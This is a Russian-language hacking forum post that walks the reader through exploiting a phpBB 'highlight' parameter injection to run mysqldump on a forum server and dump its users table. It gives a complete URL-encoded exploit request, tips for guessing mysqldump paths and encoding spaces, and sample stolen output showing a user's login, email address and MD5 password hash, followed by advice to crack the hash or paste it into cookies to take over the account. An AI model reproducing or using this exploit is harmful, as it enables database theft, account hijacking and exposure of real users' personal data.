|
Новичок
Регистрация: 07.11.2004
Сообщений: 4
Провел на форуме: 0
Репутация:
0
|
|
Насчёт дампа базы.
Mysql-база дампится запросами вида:
mysqldump -u -p dbname > file
После -u должнен идти dbuser,например -uadmin,
после -p dbpasswd,например -ppass,
с dbname,надеюсь,всё ясно.Но т.к. целиком база не нужна,
то нужно ещё указать конкретную её часть,а именно,phpbb_users.
(примечание:название может быть другое,например forum_users,как
узнать префикс,читай выше).
Вместо > лучше писать %3E
file-имя файла,куда должна сдампиться база(теоритически).У меня
phpbb_users просто вывелось на страницу.
ВНИМАНИЕ:В запросе важно указать ПОЛНЫЙ ПУТЬ К МУСКУЛЮ,а точнее,
к файлу mysqldump(путь надо предварительно разведать командами
типа ls или cd).Например,пути могут быть такими:
/usr/local/mysql/bin/mysqldump
/usr/local/bin/mysqldump
/usr/bin/mysqldump
Пример:
Если dbuser=root,dbpasswd=qwerty,dbname=baza,prefix=php bb_,
mysqldump лежит в /usr/bin/,запрос будет таким:
p=123&highlight=%2527.$poster=%60/usr/bin/mysqldump%09-uroot%09-pqwerty%09baza%09phpbb_users%09%3E%09file.sql%60.% 2527
Примечание:вместо всех пробелов надо писать %09,если темы P=123 не
существует,то надо изменить номер,например,на p=321,при копировании
строки запроса в браузер,могут появиться пробелы из-за переноса строки,
их надо удалить.
Если всё прошло удачно,то появится что-то типо этого:
- MySQL dump 8.23 -- -- Host: localhost Database: baze --------------------------------------------------------- -- Server version 3.23.58 -- -- Table structure for table `forum_users`.....
Интерес представляют хэши паролей:
INSERT INTO forum_users VALUES (14,1,'Зелёная','fae0b27c451c728867a567e8c1 bb4e53',1097589801,0,1097589801,1097589772,0,0,0.0 0,1,'russian','D M d, Y g:i a',0,0,0,NULL,1,1,0,1,1,1,1,1,0,1,1,0,'',0,'opa_ho pa@mail.ru','','','Иркутск','','','','','', '','','',NULL);
В данном случае Зелёная-логин,opa_hopa@mail.ru-мыло,на которое логин регился,
fae0b27c451c728867a567e8c1bb4e53 -MD5-хэш,что бы его сломать,надо юзать прогу
MD5Inside.
Примечание:хэш можно подставить в куки вместо своего.
Enjoy!
|